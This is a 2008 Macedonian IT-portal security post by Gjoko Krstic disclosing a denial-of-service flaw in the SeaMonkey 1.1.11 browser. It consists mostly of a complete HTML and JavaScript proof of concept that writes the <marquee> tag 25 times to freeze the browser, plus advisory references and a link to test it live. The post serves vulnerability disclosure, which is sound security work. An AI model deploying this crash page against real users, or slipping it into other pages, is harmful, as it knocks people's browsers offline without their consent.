IT.com.mk - Македонски ИТ портал - SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

Компјутерска сигурност

Интернет, Дизајн и анимација, Сигурност, Мрежи, Оперативни системи

RSS Канал
Е-пошта
Биографија

Ѓоко Крстиќ

SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

Автор: Ѓоко Крстиќ
Објавено на: 09.09.2008
SeaMonkey 1.1.11 (Mozilla) е ранлив на DoS напад со помош на пренатрупување на тагот <marquee> повеќе од 24 пати во html кодот. Успешна експлоатација доведува до замрзнување на апликацијата и недостапност на истата. Следува доказ на концептот: --------------------------------------------------------------код-------------------------------------------------------------- <!-- Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC Summary: Web-browser, advanced e-mail and newsgroup client, IRC chat client, and HTML editing made simple - all your Internet needs in one application. Product web page: http://www.seamonkey-project.org/ Desc: SeaMonkey suffers from a remote denial of service vulnerability (DoS), using a special html file with the <marquee> tag multiple times (>24). Successfully exploiting these issues allows remote attackers to cause the application to freeze, denying service to legitimate users. Tested on Microsoft Windows XP SP2 (English) Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic liquidworm [t00t] gmail [d0t] com http://www.zeroscience.org 08.09.2008 --> <html> <title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title> <head> <body> <br /><br /><br /><br /> <br /><br /><br /><br /> <br /><br /><br /><br /> <center> <script type="text/javascript"> document.write("<kbd>Wooow Camel..!! WOW!</kbd>"); function t00t() { for(i=0; i < 25; i++) { document.write("<marquee>"); } } alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit"); var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation"); if (b0x == true) { t00t(); } else { alert("Allrighty Then!"); window.location.href = "http://www.disneyland.com"; } </script> </center> </body> </head> </html> --------------------------------------------------------------код-------------------------------------------------------------- Референти: - http://www.packetstormsecurity.org/filedesc/seamonkey-dos.txt.html - http://www.securityfocus.com/bid/31070 - http://www.zeroscience.org/codes/seamonkey_dos.txt Тест: ТУКА (со внимание!) Клучни зборови: SeaMonkey 1.1.11 Mozilla DoS Експлоатација JavaScript HTML marquee Код веб прелистувач

Сподели:

Последни написи на Ѓоко

Mozilla: Проверете ги вашите плагини
објавено на 21.10.2009 во Интернет

Во соработка со Adobe Product Security Incident Response Team (PSIRT)
објавено на 24.08.2009 во Сигурност

Збогување со milw0rm.com
објавено на 08.07.2009 во Интернет

Измами со кредитни картички
објавено на 07.06.2009 во Сигурност

Verizon - Сигурносен извештај за 2009
објавено на 16.04.2009 во Сигурност

Twitter сервиси

Повеќе од 50% од сите твитови на Twitter се објавени користејќи мобилни и веб-базирани алатки, а не платформата на Twitter.com. Најпопуларен сервис е TweetDeck со 19.7% искористеност. (Мај, 2009)

Нема настани во наредните денови.